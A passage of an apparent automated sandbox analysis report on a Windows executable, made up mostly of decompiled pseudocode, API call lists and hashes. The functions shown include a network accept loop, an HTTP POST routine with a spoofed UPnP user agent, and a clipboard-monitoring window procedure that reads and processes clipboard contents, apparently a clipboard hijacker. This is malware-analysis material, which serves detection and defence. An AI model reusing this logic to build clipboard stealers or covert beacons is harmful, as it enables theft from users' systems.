                                                                                                                                                                                                                                                                                    								_t77 = E0040DF90(_t56, _t49);
                                                                                                                                                                                                                                                                                    								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    								if(_t77 != 0) {
                                                                                                                                                                                                                                                                                    									_t15 = _t77 + 0x264; // 0x264
                                                                                                                                                                                                                                                                                    									E0040E220(0, _t77, _t56, _t15);
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                                    									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                                                                                                                                                                                                                    										E0040E7D0(_t77);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t34 = GetTickCount();
                                                                                                                                                                                                                                                                                    					_t74 = _v92;
                                                                                                                                                                                                                                                                                    					if(_t34 - _t74 < 0x3e8) {
                                                                                                                                                                                                                                                                                    						if(GetTickCount() - _t74 < 0x2710) {
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						EnterCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                                    						if(_t75 == 0) {
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                                    							_v92 = GetTickCount();
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                                                                                    							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                                                                                                                                                                                                                    							if(E0040BE60() - _t42 >= 0x1e) {
                                                                                                                                                                                                                                                                                    								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                    									E00409600(_t45);
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                                                                                                                                                                                                                    						} while (_t75 != 0);
                                                                                                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t76 = _t56 + 0x20;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                                                                                                                                                                                                                    						if(_t70 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040E300(_t56, _t70, _t78);
                                                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                                                                    					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                                    				} while (_t33 != 0);
                                                                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                                                    0x0040e406
                                                                                                                                                                                                                                                                                    0x0040e40c
                                                                                                                                                                                                                                                                                    0x0040e412
                                                                                                                                                                                                                                                                                    0x0040e415
                                                                                                                                                                                                                                                                                    0x0040e41f
                                                                                                                                                                                                                                                                                    0x0040e427
                                                                                                                                                                                                                                                                                    0x0040e5a9
                                                                                                                                                                                                                                                                                    0x0040e5af
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e42d
                                                                                                                                                                                                                                                                                    0x0040e42d
                                                                                                                                                                                                                                                                                    0x0040e433
                                                                                                                                                                                                                                                                                    0x0040e439
                                                                                                                                                                                                                                                                                    0x0040e444
                                                                                                                                                                                                                                                                                    0x0040e456
                                                                                                                                                                                                                                                                                    0x0040e461
                                                                                                                                                                                                                                                                                    0x0040e472
                                                                                                                                                                                                                                                                                    0x0040e480
                                                                                                                                                                                                                                                                                    0x0040e488
                                                                                                                                                                                                                                                                                    0x0040e491
                                                                                                                                                                                                                                                                                    0x0040e49b
                                                                                                                                                                                                                                                                                    0x0040e49d
                                                                                                                                                                                                                                                                                    0x0040e4a2
                                                                                                                                                                                                                                                                                    0x0040e4a4
                                                                                                                                                                                                                                                                                    0x0040e4b0
                                                                                                                                                                                                                                                                                    0x0040e4b5
                                                                                                                                                                                                                                                                                    0x0040e4bf
                                                                                                                                                                                                                                                                                    0x0040e4cb
                                                                                                                                                                                                                                                                                    0x0040e4cb
                                                                                                                                                                                                                                                                                    0x0040e4bf
                                                                                                                                                                                                                                                                                    0x0040e4a2
                                                                                                                                                                                                                                                                                    0x0040e491
                                                                                                                                                                                                                                                                                    0x0040e461
                                                                                                                                                                                                                                                                                    0x0040e4d6
                                                                                                                                                                                                                                                                                    0x0040e4d8
                                                                                                                                                                                                                                                                                    0x0040e4e3
                                                                                                                                                                                                                                                                                    0x0040e52c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e532
                                                                                                                                                                                                                                                                                    0x0040e538
                                                                                                                                                                                                                                                                                    0x0040e53d
                                                                                                                                                                                                                                                                                    0x0040e581
                                                                                                                                                                                                                                                                                    0x0040e585
                                                                                                                                                                                                                                                                                    0x0040e591
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e545
                                                                                                                                                                                                                                                                                    0x0040e557
                                                                                                                                                                                                                                                                                    0x0040e559
                                                                                                                                                                                                                                                                                    0x0040e562
                                                                                                                                                                                                                                                                                    0x0040e565
                                                                                                                                                                                                                                                                                    0x0040e56a
                                                                                                                                                                                                                                                                                    0x0040e56d
                                                                                                                                                                                                                                                                                    0x0040e56d
                                                                                                                                                                                                                                                                                    0x0040e562
                                                                                                                                                                                                                                                                                    0x0040e577
                                                                                                                                                                                                                                                                                    0x0040e57d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e4e5
                                                                                                                                                                                                                                                                                    0x0040e4e9
                                                                                                                                                                                                                                                                                    0x0040e4ef
                                                                                                                                                                                                                                                                                    0x0040e4f4
                                                                                                                                                                                                                                                                                    0x0040e51a
                                                                                                                                                                                                                                                                                    0x0040e51b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e51b
                                                                                                                                                                                                                                                                                    0x0040e4f6
                                                                                                                                                                                                                                                                                    0x0040e4ff
                                                                                                                                                                                                                                                                                    0x0040e507
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e509
                                                                                                                                                                                                                                                                                    0x0040e50a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e50a
                                                                                                                                                                                                                                                                                    0x0040e507
                                                                                                                                                                                                                                                                                    0x0040e515
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e595
                                                                                                                                                                                                                                                                                    0x0040e59b
                                                                                                                                                                                                                                                                                    0x0040e5a1
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E40C
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E41F
                                                                                                                                                                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E439
                                                                                                                                                                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E456
                                                                                                                                                                                                                                                                                    • accept.WS2_32(?,?,?), ref: 0040E488
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E4D6
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040E4E9
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E50A
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E51B
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E523
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040E532
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E545
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E585
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E58B
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E59B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                                                    • Opcode ID: 7de50fc9b847bb9cb6d9daba69930cc06020703a9bfd8fd8c2bb306a6a974427
                                                                                                                                                                                                                                                                                    • Instruction ID: 917b59bc2a3588b9956fd89eac52db2b1e6dcbcc9db4fe113c03d7dfd46bf168
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7de50fc9b847bb9cb6d9daba69930cc06020703a9bfd8fd8c2bb306a6a974427
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29413671500200ABCB209F75DC8CB9B77A9AF44714F048E3EF955A72C1EB78E891CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040CD60(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                                                                                    				char _v772;
                                                                                                                                                                                                                                                                                    				char* _v776;
                                                                                                                                                                                                                                                                                    				void* _v780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v792;
                                                                                                                                                                                                                                                                                    				char* _v796;
                                                                                                                                                                                                                                                                                    				signed short _v816;
                                                                                                                                                                                                                                                                                    				intOrPtr _v820;
                                                                                                                                                                                                                                                                                    				char* _v824;
                                                                                                                                                                                                                                                                                    				void _v836;
                                                                                                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                                                                                                    				void* _v844;
                                                                                                                                                                                                                                                                                    				void* _v848;
                                                                                                                                                                                                                                                                                    				char* _v852;
                                                                                                                                                                                                                                                                                    				long _v856;
                                                                                                                                                                                                                                                                                    				void _v1884;
                                                                                                                                                                                                                                                                                    				long _v1888;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v776 = 0;
                                                                                                                                                                                                                                                                                    				_v840 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                                    				_t103 = _t102 + 0xc;
                                                                                                                                                                                                                                                                                    				_v840 = 0x3c;
                                                                                                                                                                                                                                                                                    				_v824 =  &_v260;
                                                                                                                                                                                                                                                                                    				_v820 = 0x100;
                                                                                                                                                                                                                                                                                    				_v796 =  &_v772;
                                                                                                                                                                                                                                                                                    				_v792 = 0x200;
                                                                                                                                                                                                                                                                                    				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                                    				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v780 != 0) {
                                                                                                                                                                                                                                                                                    					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v844 != 0) {
                                                                                                                                                                                                                                                                                    						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v848 != 0) {
                                                                                                                                                                                                                                                                                    							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                                                                                                                                                                                                                    							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                                                                                                                                                                                                                    							if(HttpSendRequestA(_v848, _v852, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                                                                                                                                                                                                                    								_v856 = 0;
                                                                                                                                                                                                                                                                                    								while(1 != 0) {
                                                                                                                                                                                                                                                                                    									_t98 = _v848;
                                                                                                                                                                                                                                                                                    									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                                                                                                                                                                                                                    										_v776 = E00408B60(_v776, _t98, _v776, _v856 + _v1888);
                                                                                                                                                                                                                                                                                    										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                                                                                                                                                                                                                    										_t103 = _t103 + 0x14;
                                                                                                                                                                                                                                                                                    										_v856 = _v856 + _v1888;
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								 *_a16 = _v856;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v776;
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x0040cd69
                                                                                                                                                                                                                                                                                    0x0040cd73
                                                                                                                                                                                                                                                                                    0x0040cd88
                                                                                                                                                                                                                                                                                    0x0040cd8d
                                                                                                                                                                                                                                                                                    0x0040cd90
                                                                                                                                                                                                                                                                                    0x0040cda0
                                                                                                                                                                                                                                                                                    0x0040cda6
                                                                                                                                                                                                                                                                                    0x0040cdb6
                                                                                                                                                                                                                                                                                    0x0040cdbc
                                                                                                                                                                                                                                                                                    0x0040cdd8
                                                                                                                                                                                                                                                                                    0x0040cdf1
                                                                                                                                                                                                                                                                                    0x0040cdfe
                                                                                                                                                                                                                                                                                    0x0040ce2a
                                                                                                                                                                                                                                                                                    0x0040ce37
                                                                                                                                                                                                                                                                                    0x0040ce60
                                                                                                                                                                                                                                                                                    0x0040ce6d
                                                                                                                                                                                                                                                                                    0x0040ce85
                                                                                                                                                                                                                                                                                    0x0040ce8b
                                                                                                                                                                                                                                                                                    0x0040ceb7
                                                                                                                                                                                                                                                                                    0x0040cebd
                                                                                                                                                                                                                                                                                    0x0040cec7
                                                                                                                                                                                                                                                                                    0x0040cee7
                                                                                                                                                                                                                                                                                    0x0040cef6
                                                                                                                                                                                                                                                                                    0x0040cf1f
                                                                                                                                                                                                                                                                                    0x0040cf40
                                                                                                                                                                                                                                                                                    0x0040cf45
                                                                                                                                                                                                                                                                                    0x0040cf54
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040cf54
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040cef6
                                                                                                                                                                                                                                                                                    0x0040cf68
                                                                                                                                                                                                                                                                                    0x0040cf68
                                                                                                                                                                                                                                                                                    0x0040cf71
                                                                                                                                                                                                                                                                                    0x0040cf71
                                                                                                                                                                                                                                                                                    0x0040cf7e
                                                                                                                                                                                                                                                                                    0x0040cf7e
                                                                                                                                                                                                                                                                                    0x0040cf8b
                                                                                                                                                                                                                                                                                    0x0040cf8b
                                                                                                                                                                                                                                                                                    0x0040cf9a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040CD88
                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040CDD8
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040CDEB
                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040CE24
                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CE5A
                                                                                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040CE85
                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,004108D0,000000FF,00009E34), ref: 0040CEAF
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040CEEE
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040CF40
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF71
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF7E
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF8B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                                                    • Opcode ID: c6376e83d60c8fd7847bc7aaada5821a3adf07af9ef20e77e1c46dfbd3437302
                                                                                                                                                                                                                                                                                    • Instruction ID: ea500a29b1865390ea74af70c7a13144c6f50436d918f4b951375f33d6e11f24
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6376e83d60c8fd7847bc7aaada5821a3adf07af9ef20e77e1c46dfbd3437302
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A512CB5900228ABDB26DF54CC94BD973BDAB48705F1081E9B60DA62C0C7B86FC4CF54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 480 4041a0-4041c2 GetWindowLongW 481 4041c4-4041cb 480->481 482 4041e6-4041ed 480->482 483 4041d1-4041d5 481->483 484 404257-404268 IsClipboardFormatAvailable 481->484 485 404216-40421c 482->485 486 4041ef 482->486 489 4041f4-404211 SetClipboardViewer SetWindowLongW 483->489 490 4041d7-4041db 483->490 487 404273-40427d IsClipboardFormatAvailable 484->487 488 40426a-404271 484->488 492 404236-40423a 485->492 493 40421e-404234 SetWindowLongW 485->493 491 4043d4-4043ed DefWindowProcA 486->491 495 404288-404292 IsClipboardFormatAvailable 487->495 496 40427f-404286 487->496 494 40429b-40429f 488->494 489->491 497 4041e1 490->497 498 40438d-4043ce RegisterRawInputDevices ChangeClipboardChain 490->498 499 404252 492->499 500 40423c-40424c SendMessageA 492->500 493->499 502 4042a5-4042af OpenClipboard 494->502 503 40436f-404373 494->503 495->494 501 404294 495->501 496->494 497->491 498->491 499->491 500->499 501->494 502->503 504 4042b5-4042c6 GetClipboardData 502->504 505 404375-404385 SendMessageA 503->505 506 40438b 503->506 507 4042c8 504->507 508 4042cd-4042de GlobalLock 504->508 505->506 506->491 507->491 509 4042e0 508->509 510 4042e5-4042f6 508->510 509->491 511 4042f8-4042fc 510->511 512 404319-40432c call 403fb0 510->512 514 40432e-40433e call 4040d0 511->514 515 4042fe-404302 511->515 521 404341-404355 GlobalUnlock CloseClipboard 512->521 514->521 518 404304 515->518 519 404306-404317 call 403ef0 515->519 518->521 519->521 521->503 524 404357-40436c call 403480 call 408c70 521->524 524->503
                                                                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                    			E004041A0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                                                                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                                                    				struct HWND__* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t90;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t97;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t98;
                                                                                                                                                                                                                                                                                    				void* _t129;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                                                                                                                                                                                                                    				_v40 = _a8;
                                                                                                                                                                                                                                                                                    				if(_v40 > 0x308) {
                                                                                                                                                                                                                                                                                    					if(_v40 == 0x30d) {
                                                                                                                                                                                                                                                                                    						if(_a12 != _v8) {
                                                                                                                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v8 = _a16;
                                                                                                                                                                                                                                                                                    							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L38:
                                                                                                                                                                                                                                                                                    						return DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v40 == 0x308) {
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                                                                                                                                                                                                                    						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                                                                                                                                                                                                                    							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                                                                                                                                                                                                                    								_v12 = 7;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v12 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v12 = 0xd;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                                                                                                                                                                                                                    						L34:
                                                                                                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v24 = GetClipboardData(_v12);
                                                                                                                                                                                                                                                                                    						if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    							_v20 = GlobalLock(_v24);
                                                                                                                                                                                                                                                                                    							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                                                                                                                                    								_v44 = _v12;
                                                                                                                                                                                                                                                                                    								if(_v44 == 1) {
                                                                                                                                                                                                                                                                                    									_t90 = E00403FB0(_v20, 0, 0);
                                                                                                                                                                                                                                                                                    									_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                                    									_v16 = _t90;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									if(_v44 == 7) {
                                                                                                                                                                                                                                                                                    										_t97 = E004040D0(_v20, 0, 0);
                                                                                                                                                                                                                                                                                    										_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                                    										_v16 = _t97;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										if(_v44 == 0xd) {
                                                                                                                                                                                                                                                                                    											_t98 = E00403EF0(_v20, _v20, 0);
                                                                                                                                                                                                                                                                                    											_t129 = _t129 + 8;
                                                                                                                                                                                                                                                                                    											_v16 = _t98;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								GlobalUnlock(_v24);
                                                                                                                                                                                                                                                                                    								CloseClipboard();
                                                                                                                                                                                                                                                                                    								if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    									E00403480(_v16);
                                                                                                                                                                                                                                                                                    									E00408C70(_v16);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L38;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v40 == 1) {
                                                                                                                                                                                                                                                                                    					_v8 = SetClipboardViewer(_a4);
                                                                                                                                                                                                                                                                                    					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_v40 == 2) {
                                                                                                                                                                                                                                                                                    						_v36 = 0;
                                                                                                                                                                                                                                                                                    						_v34 = 0;
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v26 = 0;
                                                                                                                                                                                                                                                                                    						_v36 = 1;
